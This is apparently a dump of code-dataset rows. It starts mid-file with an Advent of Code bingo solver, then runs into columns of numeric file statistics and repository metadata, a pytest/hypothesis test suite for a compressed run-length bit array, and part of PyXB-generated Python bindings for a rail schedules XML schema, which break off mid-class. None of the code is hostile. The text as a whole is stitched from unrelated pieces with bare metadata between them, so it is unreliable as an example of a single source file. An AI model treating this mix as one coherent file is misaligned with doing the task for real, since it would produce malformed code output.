                        exit()
# Part Two
# NOTE(review): input() keeps reading from the same handle, so this expects the
# puzzle input to appear a second time in input.txt — confirm the file layout.
nums = list(map(int, input().split(',')))
boards = []
d = {i: {'row': {j: [] for j in range(5)}, 'col': {j: [] for j in range(5)}} for i in range(100)}
unseen = set(range(100))  # boards that have not yet won
for _ in range(100):
    board = []
    for _ in range(6):
        row = list(map(int, input().split()))
        if row:
            board.append(row)
    boards.append(board)
for num in nums:
    for i in range(100):
        for j in range(5):
            for k in range(5):
                if boards[i][j][k] == num:
                    d[i]['row'][j].append(num)
                    d[i]['col'][k].append(num)
                    if len(d[i]['row'][j]) == 5:
                        if len(unseen) > 1:
                            # Not the last board: just record that it has won.
                            if i in unseen:
                                unseen.remove(i)
                        elif i in unseen:
                            # Last remaining board just won: print its score and stop.
                            sm = 0
                            for row in boards[i]:
                                sm += sum(row)
                                print(row)
                            for l in range(5):
                                for n in d[i]['row'][l]:
                                    sm -= n
                            print(num, sm, num*sm, nums.index(num), d[i])
                            exit()
                    if len(d[i]['col'][k]) == 5:
                        if len(unseen) > 1:
                            if i in unseen:
                                unseen.remove(i)
                        elif i in unseen:
                            sm = 0
                            for row in boards[i]:
                                sm += sum(row)
                                print(row)
                            for l in range(5):
                                for n in d[i]['col'][l]:
                                    sm -= n
                            print(num, sm, num*sm, nums.index(num), d[i])
                            exit()
| 37.326087
| 97
| 0.321782
| 397
| 3,434
| 2.7733
| 0.120907
| 0.127157
| 0.087193
| 0.079927
| 0.93188
| 0.93188
| 0.93188
| 0.93188
| 0.93188
| 0.93188
| 0
| 0.028644
| 0.542516
| 3,434
| 91
| 98
| 37.736264
| 0.672183
| 0.004951
| 0
| 0.953488
| 0
| 0
| 0.020504
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011628
| 0
| 0.011628
| 0.093023
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e2480dd129b05371703882723aecb89ee717ec12
| 8,254
|
py
|
Python
|
tests/test_compressed_runs_bit_array.py
|
miiohio/succinct
|
c5adc7b409264d027e4ea97d18d809f39434861f
|
[
"MIT"
] | 56
|
2020-07-09T23:32:12.000Z
|
2022-02-09T15:16:22.000Z
|
tests/test_compressed_runs_bit_array.py
|
miiohio/succinct
|
c5adc7b409264d027e4ea97d18d809f39434861f
|
[
"MIT"
] | null | null | null |
tests/test_compressed_runs_bit_array.py
|
miiohio/succinct
|
c5adc7b409264d027e4ea97d18d809f39434861f
|
[
"MIT"
] | 5
|
2020-07-22T00:12:09.000Z
|
2021-05-27T08:12:50.000Z
|
from datetime import timedelta
from typing import List
from bitarray import bitarray
from hypothesis import assume, example, given, settings
from hypothesis import strategies as st
from succinct.compressed_runs_bit_array import CompressedRunsBitArray
def test_compressed_runs_bit_array_rank_example_1a() -> None:
    """rank() over a fixed bit pattern matches hand-computed prefix one-counts."""
    crba = CompressedRunsBitArray(bitarray('00001111111100101111'))
    expected_ranks = [0, 0, 0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 8, 8, 9, 9, 10, 11, 12, 13]
    for position, want in enumerate(expected_ranks):
        assert crba.rank(position) == want
def test_compressed_runs_bit_array_rank_example_1b() -> None:
    """rank_zero() over the complementary pattern matches prefix zero-counts."""
    crba = CompressedRunsBitArray(bitarray('11110000000011010000'))
    expected_ranks = [0, 0, 0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 8, 8, 9, 9, 10, 11, 12, 13]
    for position, want in enumerate(expected_ranks):
        assert crba.rank_zero(position) == want
def test_compressed_runs_bit_array_rank_example_2a() -> None:
    """rank() on a pattern that starts with a set bit."""
    crba = CompressedRunsBitArray(bitarray('100001111111100101111'))
    expected_ranks = [1, 1, 1, 1, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9, 9, 10, 10, 11, 12, 13, 14]
    for position, want in enumerate(expected_ranks):
        assert crba.rank(position) == want
def test_compressed_runs_bit_array_rank_example_2b() -> None:
    """rank_zero() on a pattern that starts with a clear bit."""
    crba = CompressedRunsBitArray(bitarray('011110000000011010000'))
    expected_ranks = [1, 1, 1, 1, 1, 2, 3, 4, 5, 6, 7, 8, 9, 9, 9, 10, 10, 11, 12, 13, 14]
    for position, want in enumerate(expected_ranks):
        assert crba.rank_zero(position) == want
def test_compressed_runs_bit_array_select_example_1a() -> None:
    """select(k) returns the position of the k-th set bit in a fixed pattern."""
    crba = CompressedRunsBitArray(bitarray('00001111111100101111'))
    expected_positions = [4, 5, 6, 7, 8, 9, 10, 11, 14, 16, 17, 18, 19]
    for k, want in enumerate(expected_positions):
        assert crba.select(k) == want
def test_compressed_runs_bit_array_select_example_1b() -> None:
    """select_zero(k) returns the position of the k-th clear bit."""
    crba = CompressedRunsBitArray(bitarray('11110000000011010000'))
    expected_positions = [4, 5, 6, 7, 8, 9, 10, 11, 14, 16, 17, 18, 19]
    for k, want in enumerate(expected_positions):
        assert crba.select_zero(k) == want
def test_compressed_runs_bit_array_select_example_2a() -> None:
    """select() on a pattern that starts with a set bit."""
    crba = CompressedRunsBitArray(bitarray('100001111111100101111'))
    expected_positions = [0, 5, 6, 7, 8, 9, 10, 11, 12, 15, 17, 18, 19, 20]
    for k, want in enumerate(expected_positions):
        assert crba.select(k) == want
def test_compressed_runs_bit_array_select_example_2b() -> None:
    """select_zero() on a pattern that starts with a clear bit."""
    crba = CompressedRunsBitArray(bitarray('011110000000011010000'))
    expected_positions = [0, 5, 6, 7, 8, 9, 10, 11, 12, 15, 17, 18, 19, 20]
    for k, want in enumerate(expected_positions):
        assert crba.select_zero(k) == want
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=None)
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_getitem(bb: bytes) -> None:
    """Indexing the compressed array agrees with the raw bitarray at every position."""
    assume(len(bb) % 8 == 0)
    raw = bitarray()
    raw.frombytes(bb)
    compressed = CompressedRunsBitArray(raw)
    for idx in range(len(raw)):
        assert compressed[idx] == raw[idx]
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=timedelta(milliseconds=2000))
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_rank(bb: bytes) -> None:
    """rank(i) equals the count of set bits in positions 0..i inclusive."""
    assume(len(bb) % 8 == 0)
    raw = bitarray()
    raw.frombytes(bb)
    compressed = CompressedRunsBitArray(raw)
    ones_so_far = 0
    for idx in range(len(raw)):
        ones_so_far += raw[idx]
        assert compressed.rank(idx) == ones_so_far
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=timedelta(milliseconds=2000))
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_rank_zero(bb: bytes) -> None:
    """rank_zero(i) equals the count of clear bits in positions 0..i inclusive."""
    assume(len(bb) % 8 == 0)
    raw = bitarray()
    raw.frombytes(bb)
    compressed = CompressedRunsBitArray(raw)
    zeros_so_far = 0
    for idx in range(len(raw)):
        zeros_so_far += (not raw[idx])
        assert compressed.rank_zero(idx) == zeros_so_far
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=timedelta(milliseconds=500))
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_select(bb: bytes) -> None:
    """select(k) returns the position of the k-th set bit, for every k."""
    assume(len(bb) % 8 == 0)
    raw = bitarray()
    raw.frombytes(bb)
    compressed = CompressedRunsBitArray(raw)
    one_positions = [idx for idx in range(len(raw)) if raw[idx]]
    for k, pos in enumerate(one_positions):
        assert compressed.select(k) == pos
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=timedelta(milliseconds=2000))
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_select_zero(bb: bytes) -> None:
    """select_zero(k) returns the position of the k-th clear bit, for every k."""
    assume(len(bb) % 8 == 0)
    raw = bitarray()
    raw.frombytes(bb)
    compressed = CompressedRunsBitArray(raw)
    zero_positions = [idx for idx in range(len(raw)) if not raw[idx]]
    for k, pos in enumerate(zero_positions):
        assert compressed.select_zero(k) == pos
| 30.234432
| 76
| 0.656894
| 1,245
| 8,254
| 4.210442
| 0.072289
| 0.268981
| 0.224342
| 0.14422
| 0.93037
| 0.841473
| 0.841473
| 0.836894
| 0.801793
| 0.774704
| 0
| 0.099939
| 0.205961
| 8,254
| 272
| 77
| 30.345588
| 0.699878
| 0
| 0
| 0.651786
| 0
| 0
| 0.019869
| 0.010177
| 0
| 0
| 0
| 0
| 0.629464
| 1
| 0.058036
| false
| 0
| 0.026786
| 0
| 0.084821
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e255a6120e394fa20a70f26066608a45d90618dc
| 83,995
|
py
|
Python
|
darwinpush/xb/raw/sch.py
|
fasteroute/darwinpush
|
c919049e076cbdf61007fc9cc1c5a0271cde7929
|
[
"Apache-2.0"
] | 3
|
2015-08-15T15:38:06.000Z
|
2019-08-06T11:09:32.000Z
|
darwinpush/xb/raw/sch.py
|
grundleborg/darwinpush
|
c919049e076cbdf61007fc9cc1c5a0271cde7929
|
[
"Apache-2.0"
] | 34
|
2015-07-22T13:47:16.000Z
|
2015-08-12T17:40:23.000Z
|
darwinpush/xb/raw/sch.py
|
grundleborg/darwinpush
|
c919049e076cbdf61007fc9cc1c5a0271cde7929
|
[
"Apache-2.0"
] | 1
|
2015-08-30T15:26:24.000Z
|
2015-08-30T15:26:24.000Z
|
# ./darwinpush/xb/raw/sch.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:a4d0e93b3d986983d09f604844e6ca8969d2f70c
# Generated 2015-04-23 16:42:14.518511 by PyXB version 1.2.4 using Python 3.4.1.final.0
# Namespace http://www.thalesgroup.com/rtti/PushPort/Schedules/v1 [xmlns:sch]
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:5049f1de-e9cf-11e4-bb50-a0481ca50ab0')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
    raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
import darwinpush.xb.ct as _ImportedBinding_darwinpush_xb_ct
# NOTE: All namespace declarations are reserved within the binding
# Register (or reuse) the schema's target namespace and enable the two
# category maps this module populates: type bindings and element bindings.
Namespace = pyxb.namespace.NamespaceForURI('http://www.thalesgroup.com/rtti/PushPort/Schedules/v1', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
    """Parse the given XML and use the document element to create a
    Python instance.

    @param xml_text An XML document. This should be data (Python 2
    str or Python 3 bytes), or a text (Python 2 unicode or Python 3
    str) in the L{pyxb._InputEncoding} encoding.

    @keyword default_namespace The L{pyxb.Namespace} instance to use as the
    default namespace where there is no default namespace in scope.
    If unspecified or C{None}, the namespace of the module containing
    this function will be used.

    @keyword location_base: An object to be recorded as the base of all
    L{pyxb.utils.utility.Location} instances associated with events and
    objects handled by the parser. You might pass the URI from which
    the document was obtained.
    """
    # If the runtime is not configured for SAX-style parsing, fall back to DOM.
    if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
        dom = pyxb.utils.domutils.StringToDOM(xml_text)
        return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
    handler = saxer.getContentHandler()
    xmld = xml_text
    # The SAX parser consumes bytes; encode text input before feeding it.
    if isinstance(xmld, _six.text_type):
        xmld = xmld.encode(pyxb._InputEncoding)
    saxer.parse(io.BytesIO(xmld))
    instance = handler.rootObject()
    return instance
def CreateFromDOM (node, default_namespace=None):
    """Create a Python instance from the given DOM node.

    The node tag must correspond to an element declaration in this module.

    @deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}CategoryType
class CategoryType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
    """Association Category Type: JJ=Join, VV=Split, LK=Linked, NP=Next-Working"""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CategoryType')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 15, 1)
    _Documentation = 'Association Category Type: JJ=Join, VV=Split, LK=Linked, NP=Next-Working'
# The enumeration facet is attached after the class statement because it needs
# to reference the class object itself as its value datatype.
CategoryType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CategoryType, enum_prefix=None)
CategoryType.JJ = CategoryType._CF_enumeration.addEnumeration(unicode_value='JJ', tag='JJ')  # Join
CategoryType.VV = CategoryType._CF_enumeration.addEnumeration(unicode_value='VV', tag='VV')  # Split
CategoryType.LK = CategoryType._CF_enumeration.addEnumeration(unicode_value='LK', tag='LK')  # Linked
CategoryType.NP = CategoryType._CF_enumeration.addEnumeration(unicode_value='NP', tag='NP')  # Next-Working
CategoryType._InitializeFacetMap(CategoryType._CF_enumeration)
# Register the binding so the namespace can resolve the XSD type by name.
Namespace.addCategoryObject('typeBinding', 'CategoryType', CategoryType)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}AssocService with content type EMPTY
class AssocService (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}AssocService with content type EMPTY"""
    # PyXB-generated binding: an empty-content complex type whose attributes
    # identify one service taking part in an Association, keyed by its RID.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'AssocService')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 27, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute wta uses Python identifier wta
    __wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType)
    __wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 243, 2)
    __wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 243, 2)
    wta = property(__wta.value, __wta.set, None, 'Working time of arrival.')
    # Attribute wtd uses Python identifier wtd
    __wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType)
    __wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 248, 2)
    __wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 248, 2)
    wtd = property(__wtd.value, __wtd.set, None, 'Working time of departure.')
    # Attribute wtp uses Python identifier wtp
    __wtp = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtp'), 'wtp', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_wtp', _ImportedBinding_darwinpush_xb_ct.WTimeType)
    __wtp._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 253, 2)
    __wtp._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 253, 2)
    wtp = property(__wtp.value, __wtp.set, None, 'Working time of pass.')
    # Attribute pta uses Python identifier pta
    __pta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'pta'), 'pta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_pta', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
    __pta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 258, 2)
    __pta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 258, 2)
    pta = property(__pta.value, __pta.set, None, 'Public time of arrival.')
    # Attribute ptd uses Python identifier ptd
    __ptd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ptd'), 'ptd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_ptd', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
    __ptd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 263, 2)
    __ptd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTCommonTypes_v1.xsd', 263, 2)
    ptd = property(__ptd.value, __ptd.set, None, 'Public time of departure.')
    # Attribute rid uses Python identifier rid (required)
    __rid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rid'), 'rid', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_AssocService_rid', _ImportedBinding_darwinpush_xb_ct.RIDType, required=True)
    __rid._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 28, 2)
    __rid._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 28, 2)
    rid = property(__rid.value, __rid.set, None, 'RTTI Train ID. Note that since this is an RID, the service must already exist within Darwin.')
    # Empty: this complex type declares no child elements.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __wta.name() : __wta,
        __wtd.name() : __wtd,
        __wtp.name() : __wtp,
        __pta.name() : __pta,
        __ptd.name() : __ptd,
        __rid.name() : __rid
    })
# Register the binding so the namespace can resolve the XSD type by name.
Namespace.addCategoryObject('typeBinding', 'AssocService', AssocService)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}Association with content type ELEMENT_ONLY
class Association (pyxb.binding.basis.complexTypeDefinition):
    """Type describing an association between schedules"""
    # PyXB-generated binding: links a "main" service and an "assoc" service at
    # a given TIPLOC, with the association category and cancel/delete flags.
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Association')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 39, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}main uses Python identifier main
    __main = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'main'), 'main', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_httpwww_thalesgroup_comrttiPushPortSchedulesv1main', False, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 44, 3), )
    main = property(__main.value, __main.set, None, 'The through, previous working or link-to service')
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}assoc uses Python identifier assoc
    __assoc = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'assoc'), 'assoc', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_httpwww_thalesgroup_comrttiPushPortSchedulesv1assoc', False, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 49, 3), )
    assoc = property(__assoc.value, __assoc.set, None, 'The starting, terminating, subsequent working or link-from service')
    # Attribute tiploc uses Python identifier tiploc (required)
    __tiploc = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tiploc'), 'tiploc', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_tiploc', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
    __tiploc._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 55, 2)
    __tiploc._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 55, 2)
    tiploc = property(__tiploc.value, __tiploc.set, None, 'The TIPLOC of the location where the association occurs.')
    # Attribute category uses Python identifier category (required, see CategoryType)
    __category = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'category'), 'category', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_category', CategoryType, required=True)
    __category._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 60, 2)
    __category._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 60, 2)
    category = property(__category.value, __category.set, None, 'Association category')
    # Attribute isCancelled uses Python identifier isCancelled (defaults to false)
    __isCancelled = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isCancelled'), 'isCancelled', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_isCancelled', pyxb.binding.datatypes.boolean, unicode_default='false')
    __isCancelled._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 65, 2)
    __isCancelled._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 65, 2)
    isCancelled = property(__isCancelled.value, __isCancelled.set, None, 'True if this association is cancelled, i.e. the association exists but will no longer happen.')
    # Attribute isDeleted uses Python identifier isDeleted (defaults to false)
    __isDeleted = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isDeleted'), 'isDeleted', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Association_isDeleted', pyxb.binding.datatypes.boolean, unicode_default='false')
    __isDeleted._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 70, 2)
    __isDeleted._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 70, 2)
    isDeleted = property(__isDeleted.value, __isDeleted.set, None, 'True if this association is deleted, i.e. the association no longer exists.')
    _ElementMap.update({
        __main.name() : __main,
        __assoc.name() : __assoc
    })
    _AttributeMap.update({
        __tiploc.name() : __tiploc,
        __category.name() : __category,
        __isCancelled.name() : __isCancelled,
        __isDeleted.name() : __isDeleted
    })
# Register the binding so the namespace can resolve the XSD type by name.
Namespace.addCategoryObject('typeBinding', 'Association', Association)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OR with content type EMPTY
class OR (pyxb.binding.basis.complexTypeDefinition):
    """Defines a Passenger Origin Calling Point"""
    # PyXB-generated binding: empty-content calling-point type; all data is
    # carried in attributes (TIPLOC, activities, public/working times, etc.).
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'OR')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 116, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute tpl uses Python identifier tpl (required)
    __tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
    __tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    __tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
    # Attribute act uses Python identifier act (default is a blank activity code)
    __act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default='  ')
    __act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    __act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    act = property(__act.value, __act.set, None, 'Current Activity Codes')
    # Attribute planAct uses Python identifier planAct
    __planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
    __planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    __planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
    # Attribute can uses Python identifier can (defaults to false)
    __can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_can', pyxb.binding.datatypes.boolean, unicode_default='false')
    __can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    __can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    can = property(__can.value, __can.set, None, 'Cancelled')
    # Attribute pta uses Python identifier pta
    __pta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'pta'), 'pta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_pta', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
    __pta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
    __pta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 105, 2)
    pta = property(__pta.value, __pta.set, None, 'Public Scheduled Time of Arrival')
    # Attribute ptd uses Python identifier ptd
    __ptd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ptd'), 'ptd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_ptd', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
    __ptd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
    __ptd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
    ptd = property(__ptd.value, __ptd.set, None, 'Public Scheduled Time of Departure')
    # Attribute wta uses Python identifier wta
    __wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OR_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType)
    __wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 122, 2)
    __wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 122, 2)
    wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
    # Attribute wtd uses Python identifier wtd (required for an origin point)
